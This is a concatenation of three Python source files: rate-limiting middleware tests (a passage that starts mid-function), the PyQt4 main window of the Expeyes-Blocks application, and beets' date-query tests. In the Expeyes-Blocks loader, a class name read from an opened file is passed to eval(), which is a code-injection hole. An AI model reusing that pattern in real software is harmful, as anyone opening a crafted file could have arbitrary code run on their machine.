request = self._get_index_request()
request = self._populate_limits_diff_regex(request)
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [
{
"regex": ".*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00Z",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
],
},
{
"regex": "*.*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00Z",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
],
},
],
"absolute": {},
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def _test_index_absolute_limits_json(self, expected):
request = self._get_index_request()
response = request.get_response(self.controller)
body = jsonutils.loads(response.body)
self.assertEqual(expected, body['limits']['absolute'])
def test_index_ignores_extra_absolute_limits_json(self):
self.absolute_limits = {
'in_use': {'unknown_limit': 9000},
'limit': {'unknown_limit': 9001},
}
self._test_index_absolute_limits_json({})
class TestLimiter(limits.Limiter):
pass
class LimitMiddlewareTest(BaseLimitTestSuite):
"""Tests for the `limits.RateLimitingMiddleware` class."""
@webob.dec.wsgify
def _empty_app(self, request):
"""Do-nothing WSGI app."""
pass
def setUp(self):
"""Prepare middleware for use through fake WSGI app."""
super(LimitMiddlewareTest, self).setUp()
_limits = '(GET, *, .*, 1, MINUTE)'
self.app = limits.RateLimitingMiddleware(self._empty_app, _limits,
"%s.TestLimiter" %
self.__class__.__module__)
def test_limit_class(self):
"""Test that middleware selected correct limiter class."""
assert isinstance(self.app._limiter, TestLimiter)
def test_good_request(self):
"""Test successful GET request through middleware."""
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(200, response.status_int)
def test_limited_request_json(self):
"""Test a rate-limited (413) GET request through middleware."""
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(200, response.status_int)
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(413, response.status_int)
self.assertIn('Retry-After', response.headers)
retry_after = int(response.headers['Retry-After'])
self.assertAlmostEqual(retry_after, 60, 1)
body = jsonutils.loads(response.body)
expected = "Only 1 GET request(s) can be made to * every minute."
value = body["overLimitFault"]["details"].strip()
self.assertEqual(expected, value)
class LimitTest(BaseLimitTestSuite):
"""Tests for the `limits.Limit` class."""
def test_GET_no_delay(self):
"""Test a limit handles 1 GET per second."""
limit = limits.Limit("GET", "*", ".*", 1, 1)
delay = limit("GET", "/anything")
self.assertIsNone(delay)
self.assertEqual(0, limit.next_request)
self.assertEqual(0, limit.last_request)
def test_GET_delay(self):
"""Test two calls to 1 GET per second limit."""
limit = limits.Limit("GET", "*", ".*", 1, 1)
delay = limit("GET", "/anything")
self.assertIsNone(delay)
delay = limit("GET", "/anything")
self.assertEqual(1, delay)
self.assertEqual(1, limit.next_request)
self.assertEqual(0, limit.last_request)
self.time += 4
delay = limit("GET", "/anything")
self.assertIsNone(delay)
self.assertEqual(4, limit.next_request)
self.assertEqual(4, limit.last_request)
class ParseLimitsTest(BaseLimitTestSuite):
"""Test default limits parser.
Tests for the default limits parser in the in-memory
`limits.Limiter` class.
"""
def test_invalid(self):
"""Test that parse_limits() handles invalid input correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
';;;;;')
def test_bad_rule(self):
"""Test that parse_limits() handles bad rules correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'GET, *, .*, 20, minute')
def test_missing_arg(self):
"""Test that parse_limits() handles missing args correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, 20)')
def test_bad_value(self):
"""Test that parse_limits() handles bad values correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, foo, minute)')
def test_bad_unit(self):
"""Test that parse_limits() handles bad units correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, 20, lightyears)')
def test_multiple_rules(self):
"""Test that parse_limits() handles multiple rules correctly."""
try:
l = limits.Limiter.parse_limits('(get, *, .*, 20, minute);'
'(PUT, /foo*, /foo.*, 10, hour);'
'(POST, /bar*, /bar.*, 5, second);'
'(Say, /derp*, /derp.*, 1, day)')
except ValueError as e:
assert False, six.text_types(e)
# Make sure the number of returned limits are correct
self.assertEqual(4, len(l))
# Check all the verbs...
expected = ['GET', 'PUT', 'POST', 'SAY']
self.assertEqual(expected, [t.verb for t in l])
# ...the URIs...
expected = ['*', '/foo*', '/bar*', '/derp*']
self.assertEqual(expected, [t.uri for t in l])
# ...the regexes...
expected = ['.*', '/foo.*', '/bar.*', '/derp.*']
self.assertEqual(expected, [t.regex for t in l])
# ...the values...
expected = [20, 10, 5, 1]
self.assertEqual(expected, [t.value for t in l])
# ...and the units...
expected = [limits.PER_MINUTE, limits.PER_HOUR,
limits.PER_SECOND, limits.PER_DAY]
self.assertEqual(expected, [t.unit for t in l])
class LimiterTest(BaseLimitTestSuite):
"""Tests for the in-memory `limits.Limiter` class."""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
userlimits = {'user:user3': ''}
self.limiter = limits.Limiter(TEST_LIMITS, **userlimits)
def _check(self, num, verb, url, username=None):
"""Check and yield results from checks."""
for x in moves.range(num):
yield self.limiter.check_for_delay(verb, url, username)[0]
def _check_sum(self, num, verb, url, username=None):
"""Check and sum results from checks."""
results = self._check(num, verb, url, username)
return sum(item for item in results if item)
def test_no_delay_GET(self):
"""Test no delay on GET for single call.
Simple test to ensure no delay on a single call for a limit verb we
didn"t set.
"""
delay = self.limiter.check_for_delay("GET", "/anything")
self.assertEqual((None, None), delay)
def test_no_delay_PUT(self):
"""Test no delay on single call.
Simple test to ensure no delay on a single call for a known limit.
"""
delay = self.limiter.check_for_delay("PUT", "/anything")
self.assertEqual((None, None), delay)
def test_delay_PUT(self):
"""Ensure 11th PUT will be delayed.
Ensure the 11th PUT will result in a delay of 6.0 seconds until
the next request will be granted.
"""
expected = [None] * 10 + [6.0]
results = list(self._check(11, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_delay_POST(self):
"""Ensure 8th POST will be delayed.
Ensure the 8th POST will result in a delay of 6.0 seconds until
the next request will be granced.
"""
expected = [None] * 7
results = list(self._check(7, "POST", "/anything"))
self.assertEqual(expected, results)
expected = 60.0 / 7.0
results = self._check_sum(1, "POST", "/anything")
self.failUnlessAlmostEqual(expected, results, 8)
def test_delay_GET(self):
"""Ensure the 11th GET will result in NO delay."""
expected = [None] * 11
results = list(self._check(11, "GET", "/anything"))
self.assertEqual(expected, results)
def test_delay_PUT_volumes(self):
"""Ensure PUT limits.
Ensure PUT on /volumes limits at 5 requests, and PUT elsewhere is still
OK after 5 requests...but then after 11 total requests, PUT limiting
kicks in.
"""
# First 6 requests on PUT /volumes
expected = [None] * 5 + [12.0]
results = list(self._check(6, "PUT", "/shares"))
self.assertEqual(expected, results)
# Next 5 request on PUT /anything
expected = [None] * 4 + [6.0]
results = list(self._check(5, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_delay_PUT_wait(self):
"""Test limit handling.
Ensure after hitting the limit and then waiting for the correct
amount of time, the limit will be lifted.
"""
expected = [None] * 10 + [6.0]
results = list(self._check(11, "PUT", "/anything"))
self.assertEqual(expected, results)
# Advance time
self.time += 6.0
expected = [None, 6.0]
results = list(self._check(2, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_multiple_delays(self):
"""Ensure multiple requests still get a delay."""
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything"))
self.assertEqual(expected, results)
self.time += 1.0
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_user_limit(self):
"""Test user-specific limits."""
self.assertEqual([], self.limiter.levels['user3'])
def test_multiple_users(self):
"""Tests involving multiple users."""
# User1
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
# User2
expected = [None] * 10 + [6.0] * 5
results = list(self._check(15, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
# User3
expected = [None] * 20
results = list(self._check(20, "PUT", "/anything", "user3"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [4.0] * 5
results = list(self._check(5, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
class WsgiLimiterTest(BaseLimitTestSuite):
"""Tests for `limits.WsgiLimiter` class."""
def setUp(self):
"""Run before each test."""
super(WsgiLimiterTest, self).setUp()
self.app = limits.WsgiLimiter(TEST_LIMITS)
def _request_data(self, verb, path):
"""Get data describing a limit request verb/path."""
return six.b(jsonutils.dumps({"verb": verb, "path": path}))
def _request(self, verb, url, username=None):
"""Send request.
Make sure that POSTing to the given url causes the given
username to perform the given action. Make the internal rate
limiter return delay and make sure that the WSGI app returns
the correct response.
"""
if username:
request = webob.Request.blank("/%s" % username)
else:
request = webob.Request.blank("/")
request.method = "POST"
request.body = self._request_data(verb, url)
response = request.get_response(self.app)
if "X-Wait-Seconds" in response.headers:
self.assertEqual(403, response.status_int)
return response.headers["X-Wait-Seconds"]
self.assertEqual(204, response.status_int)
def test_invalid_methods(self):
"""Only POSTs should work."""
for method in ["GET", "PUT", "DELETE", "HEAD", "OPTIONS"]:
request = webob.Request.blank("/", method=method)
response = request.get_response(self.app)
self.assertEqual(405, response.status_int)
def test_good_url(self):
delay = self._request("GET", "/something")
self.assertIsNone(delay)
def test_escaping(self):
delay = self._request("GET", "/something/jump%20up")
self.assertIsNone(delay)
def test_response_to_delays(self):
delay = self._request("GET", "/delayed")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed")
self.assertEqual('60.00', delay)
def test_response_to_delays_usernames(self):
delay = self._request("GET", "/delayed", "user1")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed", "user2")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed", "user1")
self.assertEqual('60.00', delay)
delay = self._request("GET", "/delayed", "user2")
self.assertEqual('60.00', delay)
class FakeHttplibSocket(object):
"""Fake `http_client.HTTPResponse` replacement."""
def __init__(self, response_string):
"""Initialize new `FakeHttplibSocket`."""
self._buffer = six.BytesIO(six.b(response_string))
def makefile(self, _mode, _other=None):
"""Returns the socket's internal buffer."""
return self._buffer
class FakeHttplibConnection(object):
"""Fake `http_client.HTTPConnection`."""
def __init__(self, app, host):
"""Initialize `FakeHttplibConnection`."""
self.app = app
self.host = host
def request(self, method, path, body="", headers=None):
"""Translate request to WSGI app.
Requests made via this connection actually get translated and routed
into our WSGI app, we then wait for the response and turn it back into
an `http_client.HTTPResponse`.
"""
if not headers:
headers = {}
req = webob.Request.blank(path)
req.method = method
req.headers = headers
req.host = self.host
req.body = six.b(body)
resp = str(req.get_response(self.app))
resp = "HTTP/1.0 %s" % resp
sock = FakeHttplibSocket(resp)
self.http_response = http_client.HTTPResponse(sock)
self.http_response.begin()
def getresponse(self):
"""Return our generated response from the request."""
return self.http_response
def wire_HTTPConnection_to_WSGI(host, app):
"""Wire HTTPConnection to WSGI app.
Monkeypatches HTTPConnection so that if you try to connect to
host, you are instead routed straight to the given WSGI app.
After calling this method, when any code calls
http_client.HTTPConnection(host)
the connection object will be a fake. Its requests will be sent directly
to the given WSGI app rather than through a socket.
Code connecting to hosts other than host will not be affected.
This method may be called multiple times to map different hosts to
different apps.
This method returns the original HTTPConnection object, so that the caller
can restore the default HTTPConnection interface (for all hosts).
"""
class HTTPConnectionDecorator(object):
"""Wrapper for HTTPConnection class
Wraps the real HTTPConnection class so that when you
instantiate the class you might instead get a fake instance.
"""
def __init__(self, wrapped):
self.wrapped = wrapped
def __call__(self, connection_host, *args, **kwargs):
if connection_host == host:
return FakeHttplibConnection(app, host)
else:
return self.wrapped(connection_host, *args, **kwargs)
oldHTTPConnection = http_client.HTTPConnection
http_client.HTTPConnection = HTTPConnectionDecorator(
http_client.HTTPConnection)
return oldHTTPConnection
class WsgiLimiterProxyTest(BaseLimitTestSuite):
"""Tests for the `limits.WsgiLimiterProxy` class."""
def setUp(self):
"""Set up HTTP/WSGI magic.
Do some nifty HTTP/WSGI magic which allows for WSGI to be called
directly by something like the `http_client` library.
"""
super(WsgiLimiterProxyTest, self).setUp()
self.app = limits.WsgiLimiter(TEST_LIMITS)
self.oldHTTPConnection = (
wire_HTTPConnection_to_WSGI("169.254.0.1:80", self.app))
self.proxy = limits.WsgiLimiterProxy("169.254.0.1:80")
def test_200(self):
"""Successful request test."""
delay = self.proxy.check_for_delay("GET", "/anything")
self.assertEqual((None, None), delay)
def test_403(self):
"""Forbidden request test."""
delay = self.proxy.check_for_delay("GET", "/delayed")
self.assertEqual((None, None), delay)
delay, error = self.proxy.check_for_delay("GET", "/delayed")
error = error.strip()
expected = ("60.00", six.b("403 Forbidden\n\nOnly 1 GET request(s) "
"can be made to /delayed every minute."))
self.assertEqual(expected, (delay, error))
def tearDown(self):
# restore original HTTPConnection object
http_client.HTTPConnection = self.oldHTTPConnection
super(WsgiLimiterProxyTest, self).tearDown()
class LimitsViewBuilderTest(test.TestCase):
def setUp(self):
super(LimitsViewBuilderTest, self).setUp()
self.view_builder = views.limits.ViewBuilder()
self.rate_limits = [{"URI": "*",
"regex": ".*",
"value": 10,
"verb": "POST",
"remaining": 2,
"unit": "MINUTE",
"resetTime": 1311272226},
{"URI": "*/shares",
"regex": "^/shares",
"value": 50,
"verb": "POST",
"remaining": 10,
"unit": "DAY",
"resetTime": 1311272226}]
self.absolute_limits = {
"limit": {
"shares": 111,
"gigabytes": 222,
"snapshots": 333,
"snapshot_gigabytes": 444,
"share_networks": 555,
},
"in_use": {
"shares": 65,
"gigabytes": 76,
"snapshots": 87,
"snapshot_gigabytes": 98,
"share_networks": 107,
},
}
def test_build_limits(self):
tdate = "2011-07-21T18:17:06Z"
expected_limits = {
"limits": {
"rate": [
{"uri": "*",
"regex": ".*",
"limit": [{"value": 10,
"verb": "POST",
"remaining": 2,
"unit": "MINUTE",
"next-available": tdate}]},
{"uri": "*/shares",
"regex": "^/shares",
"limit": [{"value": 50,
"verb": "POST",
"remaining": 10,
"unit": "DAY",
"next-available": tdate}]}
],
"absolute": {
"totalSharesUsed": 65,
"totalShareGigabytesUsed": 76,
"totalShareSnapshotsUsed": 87,
"totalSnapshotGigabytesUsed": 98,
"totalShareNetworksUsed": 107,
"maxTotalShares": 111,
"maxTotalShareGigabytes": 222,
"maxTotalShareSnapshots": 333,
"maxTotalSnapshotGigabytes": 444,
"maxTotalShareNetworks": 555,
}
}
}
output = self.view_builder.build(self.rate_limits,
self.absolute_limits)
self.assertDictMatch(expected_limits, output)
def test_build_limits_empty_limits(self):
expected_limits = {"limits": {"rate": [], "absolute": {}}}
abs_limits = {}
rate_limits = []
output = self.view_builder.build(rate_limits, abs_limits)
self.assertDictMatch(expected_limits, output)
| |
#!/usr/bin/python
# -*- coding: utf-8; mode: python; indent-tabs-mode: t; tab-width:4 -*-
from __future__ import print_function
license="""\
Copyright (C) 2017 Georges Khaznadar <georgesk@debian.org>
Application Expeyes-Blocks
This application may be used under the terms of the
GNU General Public License version 3.0 as published by
the Free Software Foundation, or, at your preference,
any later verion of the same.
Expeyes-Blocks is built upon Qt4 GUI libraries, see "About Qt".
This application is provided AS IS with NO WARRANTY OF ANY KIND,
INCLUDING THE WARRANTY OF DESIGN, MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE.
"""
from version import version
import copy, re
from os.path import basename
from PyQt4.QtCore import QPoint, QRect, Qt, QSize, QString, \
QTimer, QFileInfo, SIGNAL, QByteArray, QStringList
from PyQt4.QtGui import QMainWindow, QApplication, \
QMessageBox, QFileDialog, QTextCursor
def _translate(context, text, disambig):
return QApplication.translate(context, unicode(text), disambig)
from templates.ui_blocks import Ui_MainWindow
from component import Component, InputComponent
from timecomponent import TimeComponent
from voltagecomponent import VoltageComponent
from transmitcomponent import TransmitComponent
from channelcomponent import ChannelComponent
import wizard
class BlockMainWindow(QMainWindow, Ui_MainWindow):
"""
This class implements the main window of the Expeyes-Blocks
application.
"""
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
Ui_MainWindow.__init__(self)
self.setupUi(self)
self.splitter.setSizes([4,1])
self.loadComponents()
self.connectSignals()
self.fileName=None
self.dirty="" # may become "*"
self.widget.boxModel="expeyes-junior"
self.warn(_translate("eyeBlocks.mainwindow","<span style='color:blue'>[Current targetted box]</span> %1",None).arg(self.widget.boxModel))
return
def loadComponents(self, path=None):
self.widget.clear()
cList=Component.listFromRC()
for c in cList:
self.componentsList.newComponent(c)
return
def connectSignals(self):
"""
connecting signals to methods
"""
self.action_Quit.triggered.connect(self.close)
self.actionSave.triggered.connect(self.save)
self.actionSave_as.triggered.connect(self.saveAs)
self.action_Open.triggered.connect(self.load)
self.action_About.triggered.connect(self.about)
self.actionAbout_Qt.triggered.connect(self.aboutQt)
self.widget.blocksChanged.connect(self.makeDirty)
self.action_Compile.triggered.connect(self.compile_)
self.action_Run.triggered.connect(self.run)
self.actionExpeyes_17.triggered.connect(self.chooseBox("expeyes-17"))
self.actionExpeyes_Junior.triggered.connect(self.chooseBox("expeyes-junior"))
def compile_(self):
"""
Compile the current scheme to a working application.
:returns: the path to the main python program.
"""
import os, os.path
# save the file if necessary
if self.dirty=="*": self.save()
fileNameShorted=os.path.basename(str(self.fileName)).replace(".eyeblk","")
directory=os.path.join("build", fileNameShorted)
try:
os.makedirs(directory, mode=0o755)
except:
pass
l=os.listdir(directory)
l=QStringList(l)
ok=True
if l:
ok=QMessageBox.question(self,
_translate("eyeBlocks.mainwindow","OK to erase a previous build?",None),
_translate("eyeBlocks.mainwindow","Here are some previous built files:\n %1\nDo you really want to overwrite them?",None).arg(
l.join(", ")),
QMessageBox.No|QMessageBox.Yes
) == QMessageBox.Yes
if not ok: return
return wizard.compile_(self, directory)
def run(self):
"""
Compile the current scheme to a working application,
and run it in a detached thread
"""
program=self.compile_()
wizard.run(program)
return
def chooseBox(self, model):
"""
choose the targetted box
:param model: the target model
:type model:
"""
def callBack():
self.boxModel=model
self.warn(_translate("eyeBlocks.mainwindow","<span style='color:blue'>[New targetted box]</span> %1",None).arg(model))
return
return callBack
def about(self):
"""
brings up the About dialog
"""
QMessageBox.about(self,_translate("eyeBlocks.mainwindow","About",None), license)
return
def aboutQt(self):
"""
brings up the About dialog
"""
QMessageBox.aboutQt(self,_translate("eyeBlocks.mainwindow","About Qt",None))
return
versionPattern=re.compile(r"^Expeyes-Blocks version ([\.\d]+)$")
classPattern =re.compile(r"^Class Name \((\d+) bytes\)$")
blobPattern =re.compile(r"^Blob \((\d+) bytes\)$")
def load(self):
"""
Loads a component composition
"""
fileName=QFileDialog.getOpenFileName(self,
_translate("eyeBlocks.mainwindow","Open a file",None),
filter=_translate("eyeBlocks.mainwindow","Expeyes-Blocks: *.eyeblk (*.eyeblk);;All files: * (*)",None)
)
self.loadFile(fileName)
return
def loadFile(self, fileName):
"""
Loads a component composition
:param fileName: a file of saved data
:type fileName:
"""
ok=False
cur=0
with open(fileName,"rb") as instream:
s=instream.readline()
thisVersion=self.versionPattern.match(s).group(1)
# take a decision about thisVersion
components=[]
nameSize = instream.readline()
while nameSize:
size=int(self.classPattern.match(nameSize).group(1))
className=instream.readline().strip()
if len(className) != size:
raise Exception(_translate("eyeBlocks.mainwindow","Error size: %s does not match %s",None) %(size, className))
s=instream.readline()
blobSize=int(self.blobPattern.match(s).group(1))
blob=QByteArray(instream.read(blobSize))
obj, dataStream, className = eval("%s.unserialize(blob)" %className)
components.append(obj)
# prepare next iteration
nameSize = instream.readline()
if components:
ok=True
# restore components in the right pannel
self.widget.components=components
self.widget.connectSnaps()
self.widget.update()
# restore list items in the left pannel
for c in components:
self.componentsList.hideItem(c)
if ok:
self.fileName=fileName
self.dirty=""
self.setWindowTitle(self.currentTitle())
self.warn(_translate("eyeBlocks.mainwindow","<span style='color:blue'>[Loaded file]</span> %1",None).arg(fileName))
return
def save(self):
"""
Saves the current component composition
"""
if self.fileName:
with open(self.fileName,"wb") as outstream:
outstream.write("Expeyes-Blocks version %s\n" %version)
for c in self.widget.components:
c.save(outstream)
self.dirty=""
self.setWindowTitle(self.currentTitle())
self.warn(_translate("eyeBlocks.mainwindow","<span style='color:blue'>[Saved file]</span> %1",None).arg(self.fileName))
else:
self.saveAs()
return
def saveAs(self, fileName=None):
"""
Saves the current component composition in a new file
:param fileName: name of the file, defaults to None
:type fileName:
"""
if fileName: self.fileName=fileName
if not self.fileName:
self.fileName = _translate("eyeBlocks.mainwindow","untitled.eyeblk",None)
self.fileName=QFileDialog.getSaveFileName(
self, _translate("eyeBlocks.mainwindow","Save to file",None), self.fileName,
filter = _translate("eyeBlocks.mainwindow","Expeyes-Blocks: *.eyeblk (*.eyeblk);;All files: * (*)",None)
)
if self.fileName:
self.save()
return
def makeDirty(self):
self.dirty="*"
self.setWindowTitle(self.currentTitle())
return
def closeEvent(self, event):
ok = True
if self.dirty:
ok=QMessageBox.question(
self, _translate("eyeBlocks.mainwindow","Please confirm",None),
_translate("eyeBlocks.mainwindow","""\
The current work is not yet saved,
do you really want to quit the application?
""",None),
QMessageBox.Yes|QMessageBox.No) == QMessageBox.Yes
if ok:
QMainWindow.closeEvent(self,event)
event.accept() # let the window close
else:
event.ignore()
return
def currentTitle(self):
"""
:returns: the current title of the main window, taking in account the file name and a dirty flag.
:rtype: str
"""
return "Blocks (%s)%s" %(basename(str(self.fileName)), self.dirty)
def warn(self, text):
"""
appends a warning to the messages, and adds a line break.
:param text: the warning to display, with HTML syntax.
:type text: QString or str
"""
self.messages.insertHtml(text)
self.messages.insertHtml("<br>")
self.messages.ensureCursorVisible ()
return
| |
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Test for dbcore's date-based queries.
"""
from test import _common
from datetime import datetime, timedelta
import unittest
import time
from beets.dbcore.query import _parse_periods, DateInterval, DateQuery,\
InvalidQueryArgumentValueError
def _date(string):
return datetime.strptime(string, '%Y-%m-%dT%H:%M:%S')
def _datepattern(datetimedate):
return datetimedate.strftime('%Y-%m-%dT%H:%M:%S')
class DateIntervalTest(unittest.TestCase):
def test_year_precision_intervals(self):
self.assertContains('2000..2001', '2000-01-01T00:00:00')
self.assertContains('2000..2001', '2001-06-20T14:15:16')
self.assertContains('2000..2001', '2001-12-31T23:59:59')
self.assertExcludes('2000..2001', '1999-12-31T23:59:59')
self.assertExcludes('2000..2001', '2002-01-01T00:00:00')
self.assertContains('2000..', '2000-01-01T00:00:00')
self.assertContains('2000..', '2099-10-11T00:00:00')
self.assertExcludes('2000..', '1999-12-31T23:59:59')
self.assertContains('..2001', '2001-12-31T23:59:59')
self.assertExcludes('..2001', '2002-01-01T00:00:00')
self.assertContains('-1d..1d', _datepattern(datetime.now()))
self.assertExcludes('-2d..-1d', _datepattern(datetime.now()))
def test_day_precision_intervals(self):
self.assertContains('2000-06-20..2000-06-20', '2000-06-20T00:00:00')
self.assertContains('2000-06-20..2000-06-20', '2000-06-20T10:20:30')
self.assertContains('2000-06-20..2000-06-20', '2000-06-20T23:59:59')
self.assertExcludes('2000-06-20..2000-06-20', '2000-06-19T23:59:59')
self.assertExcludes('2000-06-20..2000-06-20', '2000-06-21T00:00:00')
def test_month_precision_intervals(self):
self.assertContains('1999-12..2000-02', '1999-12-01T00:00:00')
self.assertContains('1999-12..2000-02', '2000-02-15T05:06:07')
self.assertContains('1999-12..2000-02', '2000-02-29T23:59:59')
self.assertExcludes('1999-12..2000-02', '1999-11-30T23:59:59')
self.assertExcludes('1999-12..2000-02', '2000-03-01T00:00:00')
def test_hour_precision_intervals(self):
# test with 'T' separator
self.assertExcludes('2000-01-01T12..2000-01-01T13',
'2000-01-01T11:59:59')
self.assertContains('2000-01-01T12..2000-01-01T13',
'2000-01-01T12:00:00')
self.assertContains('2000-01-01T12..2000-01-01T13',
'2000-01-01T12:30:00')
self.assertContains('2000-01-01T12..2000-01-01T13',
'2000-01-01T13:30:00')
self.assertContains('2000-01-01T12..2000-01-01T13',
'2000-01-01T13:59:59')
self.assertExcludes('2000-01-01T12..2000-01-01T13',
'2000-01-01T14:00:00')
self.assertExcludes('2000-01-01T12..2000-01-01T13',
'2000-01-01T14:30:00')
# test non-range query
self.assertContains('2008-12-01T22',
'2008-12-01T22:30:00')
self.assertExcludes('2008-12-01T22',
'2008-12-01T23:30:00')
def test_minute_precision_intervals(self):
self.assertExcludes('2000-01-01T12:30..2000-01-01T12:31',
'2000-01-01T12:29:59')
self.assertContains('2000-01-01T12:30..2000-01-01T12:31',
'2000-01-01T12:30:00')
self.assertContains('2000-01-01T12:30..2000-01-01T12:31',
'2000-01-01T12:30:30')
self.assertContains('2000-01-01T12:30..2000-01-01T12:31',
'2000-01-01T12:31:59')
self.assertExcludes('2000-01-01T12:30..2000-01-01T12:31',
'2000-01-01T12:32:00')
def test_second_precision_intervals(self):
self.assertExcludes('2000-01-01T12:30:50..2000-01-01T12:30:55',
'2000-01-01T12:30:49')
self.assertContains('2000-01-01T12:30:50..2000-01-01T12:30:55',
'2000-01-01T12:30:50')
self.assertContains('2000-01-01T12:30:50..2000-01-01T12:30:55',
'2000-01-01T12:30:55')
self.assertExcludes('2000-01-01T12:30:50..2000-01-01T12:30:55',
'2000-01-01T12:30:56')
def test_unbounded_endpoints(self):
self.assertContains('..', date=datetime.max)
self.assertContains('..', date=datetime.min)
self.assertContains('..', '1000-01-01T00:00:00')
def assertContains(self, interval_pattern, date_pattern=None, date=None): # noqa
if date is None:
date = _date(date_pattern)
(start, end) = _parse_periods(interval_pattern)
interval = DateInterval.from_periods(start, end)
self.assertTrue(interval.contains(date))
def assertExcludes(self, interval_pattern, date_pattern): # noqa
date = _date(date_pattern)
(start, end) = _parse_periods(interval_pattern)
interval = DateInterval.from_periods(start, end)
self.assertFalse(interval.contains(date))
def _parsetime(s):
return time.mktime(datetime.strptime(s, '%Y-%m-%d %H:%M').timetuple())
class DateQueryTest(_common.LibTestCase):
def setUp(self):
super().setUp()
self.i.added = _parsetime('2013-03-30 22:21')
self.i.store()
def test_single_month_match_fast(self):
query = DateQuery('added', '2013-03')
matched = self.lib.items(query)
self.assertEqual(len(matched), 1)
def test_single_month_nonmatch_fast(self):
query = DateQuery('added', '2013-04')
matched = self.lib.items(query)
self.assertEqual(len(matched), 0)
def test_single_month_match_slow(self):
query = DateQuery('added', '2013-03')
self.assertTrue(query.match(self.i))
def test_single_month_nonmatch_slow(self):
query = DateQuery('added', '2013-04')
self.assertFalse(query.match(self.i))
def test_single_day_match_fast(self):
query = DateQuery('added', '2013-03-30')
matched = self.lib.items(query)
self.assertEqual(len(matched), 1)
def test_single_day_nonmatch_fast(self):
query = DateQuery('added', '2013-03-31')
matched = self.lib.items(query)
self.assertEqual(len(matched), 0)
class DateQueryTestRelative(_common.LibTestCase):
def setUp(self):
super().setUp()
# We pick a date near a month changeover, which can reveal some time
# zone bugs.
self._now = datetime(2017, 12, 31, 22, 55, 4, 101332)
self.i.added = _parsetime(self._now.strftime('%Y-%m-%d %H:%M'))
self.i.store()
def test_single_month_match_fast(self):
query = DateQuery('added', self._now.strftime('%Y-%m'))
matched = self.lib.items(query)
self.assertEqual(len(matched), 1)
def test_single_month_nonmatch_fast(self):
query = DateQuery('added', (self._now + timedelta(days=30))
.strftime('%Y-%m'))
matched = self.lib.items(query)
self.assertEqual(len(matched), 0)
def test_single_month_match_slow(self):
query = DateQuery('added', self._now.strftime('%Y-%m'))
self.assertTrue(query.match(self.i))
def test_single_month_nonmatch_slow(self):
query = DateQuery('added', (self._now + timedelta(days=30))
.strftime('%Y-%m'))
self.assertFalse(query.match(self.i))
def test_single_day_match_fast(self):
query = DateQuery('added', self._now.strftime('%Y-%m-%d'))
matched = self.lib.items(query)
self.assertEqual(len(matched), 1)
def test_single_day_nonmatch_fast(self):
query = DateQuery('added', (self._now + timedelta(days=1))
.strftime('%Y-%m-%d'))
matched = self.lib.items(query)
self.assertEqual(len(matched), 0)
class DateQueryTestRelativeMore(_common.LibTestCase):
def setUp(self):
super().setUp()
self.i.added = _parsetime(datetime.now().strftime('%Y-%m-%d %H:%M'))
self.i.store()
def test_relative(self):
for timespan in ['d', 'w', 'm', 'y']:
query = DateQuery('added', '-4' + timespan + '..+4' + timespan)
matched = self.lib.items(query)
self.assertEqual(len(matched), 1)
def test_relative_fail(self):
for timespan in ['d', 'w', 'm', 'y']:
query = DateQuery('added', '-2' + timespan + '..-1' + timespan)
matched = self.lib.items(query)
self.assertEqual(len(matched), 0)
def test_start_relative(self):
for timespan in ['d', 'w', 'm', 'y']:
query = DateQuery('added', '-4' + timespan + '..')
matched = self.lib.items(query)
self.assertEqual(len(matched), 1)
def test_start_relative_fail(self):
for timespan in ['d', 'w', 'm', 'y']:
query = DateQuery('added', '4' + timespan + '..')
matched = self.lib.items(query)
self.assertEqual(len(matched), 0)
def test_end_relative(self):
for timespan in ['d', 'w', 'm', 'y']:
query = DateQuery('added', '..+4' + timespan)
matched = self.lib.items(query)
self.assertEqual(len(matched), 1)
def test_end_relative_fail(self):
for timespan in ['d', 'w', 'm', 'y']:
query = DateQuery('added', '..-4' + timespan)
matched = self.lib.items(query)
self.assertEqual(len(matched), 0)
class DateQueryConstructTest(unittest.TestCase):
def test_long_numbers(self):
with self.assertRaises(InvalidQueryArgumentValueError):
DateQuery('added', '1409830085..1412422089')
